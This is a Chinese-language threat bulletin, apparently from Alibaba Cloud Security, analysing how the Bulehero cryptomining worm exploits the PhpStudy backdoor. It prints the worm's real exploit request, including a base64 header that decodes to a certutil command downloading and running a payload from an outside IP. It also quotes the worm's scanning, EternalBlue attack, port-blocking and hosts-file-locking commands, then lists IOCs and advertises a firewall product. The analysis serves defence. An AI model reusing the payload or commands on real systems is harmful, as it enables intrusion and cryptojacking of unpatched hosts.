威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
GET/index.phpHTTP/1.1Connection:Keep-AliveAccept:*/*Accept-Charset:c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7Accept-Encoding:gzip,deflateAccept-Language:zh-cnReferer:http://xxx:80/index.phpUser-Agent:Mozilla/4.0(compatible;MSIE9.0;WindowsNT6.1)Host:xxx解码后内容:
system('certutil.exe-urlcache-split-fhttp://60.164.250.170:3888/download.exe%SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe&%SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echomd5('phpstudy');被感染主机行为
如上图是恶意文件在主机中的行为流程图,download.exe是Bulehero的下载器,会下载名为ScarupnpLogon.exe的文件。该文件会释放多个打包的恶意文件,这些恶意文件可分为三个模块:挖矿模块、扫描模块、攻击模块。挖矿模块:该模块进行门罗币的挖矿,Bulehero在该版本中并未使用公共矿池进行挖矿,改用自建的矿池代理进行挖矿任务分发,因此可以避免暴露钱包地址,防止安全研究人员的跟踪。扫描模块:该模块会扫描互联网的特定开放端口,并将扫描结果写入到名为Result.txt的文件中
C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe-iLC:\Windows\gstmlepnk\ntkpmzgif\ip.txt-oJC:\Windows\gstmlepnk\ntkpmzgif\Result.txt--open--rate4096-p445攻击模块:该模块集成多种漏洞利用工具,读取扫描结果并攻击其他主机,如下进程是其使用永恒之蓝漏洞模块进行攻击。
C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe--InConfigC:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml--TargetIp106.14.149.128--TargetPort445--DllPayloadC:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll--DllOrdinal1ProcessNamelsass.exe--ProcessCommandLine--ProtocolSMB--Architecturex64--FunctionRundll我们对比Bulehero升级前的样本行为,发现它在主机中的行为并未有较大改变,依然是通过download.exe下载器下载文件包,并释放三个功能模块。但是它为了隐藏自身改变了恶意文件命名方式,升级前通过混淆的系统文件名进行伪装,升级后全部为随机的文件路径和文件名。虽然随机文件名相对于混淆系统文件名更容易暴露自己,但这种策略的好处是可以避免被其他挖矿病毒通过进程指纹清除,在资源竞争中占据优势。其他行为使用netsh ipsec安全工具,阻断存在漏洞的服务端口,防止其他竞争者进入。
netshipsecstaticaddfilterfilterlist=BastardsListsrcaddr=anydstaddr=Medstport=445protocol=TCPnetshipsecstaticaddfilteractionname=BastardsListaction=block修改主机host防止其他竞争者劫持域名。
cmd/cechoY|caclsC:\Windows\system32\drivers\etc\hosts/T/Dusers&echoY|caclsC:\Windows\system32\drivers\etc\hosts/T/Dadministrators&echoY|caclsC:\Windows\system32\drivers\etc\hosts/T/DSYSTEM时间线我们根据Bulehero的恶意文件编译时间和文件上传时间,可以确定Bulehero的升级时间是在10月6号的23点,距离PhpStudy后门漏洞利用方式曝光只有2周。如果企业存在漏洞,去除中间的国庆长假,真正留给企业的修复之间只有几天。从恶意文件下载次数来看,截止到发稿前已经有1万5千次的下载,可见该蠕虫传播速度极快,造成的破坏性很大。
其他攻击方式除了此次更新增加的PhpStudy后门漏洞,Bulehero还使用多种攻击方式,如下是其他已知的攻击方式。
IOCs60[.]164[.]250[.]170185[.]147[.]34[.]136fky[.]dfg45dfg45[.]bestuu[.]dfg45dfg45[.]bestuu1[.]dfg45dfg45[.]bestox[.]mygoodluck[.]bestoo[.]mygoodluck[.]best安全建议企业需要对涉及的漏洞及时修复,否则容易成为挖矿木马的受害者。建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。此外,云防火墙独有的虚拟补丁功能,能够帮助客户更灵活、更“无感”地阻断攻击。对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。本文作者:桑铎
原文链接本文为云栖社区原创内容,未经允许不得转载。
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。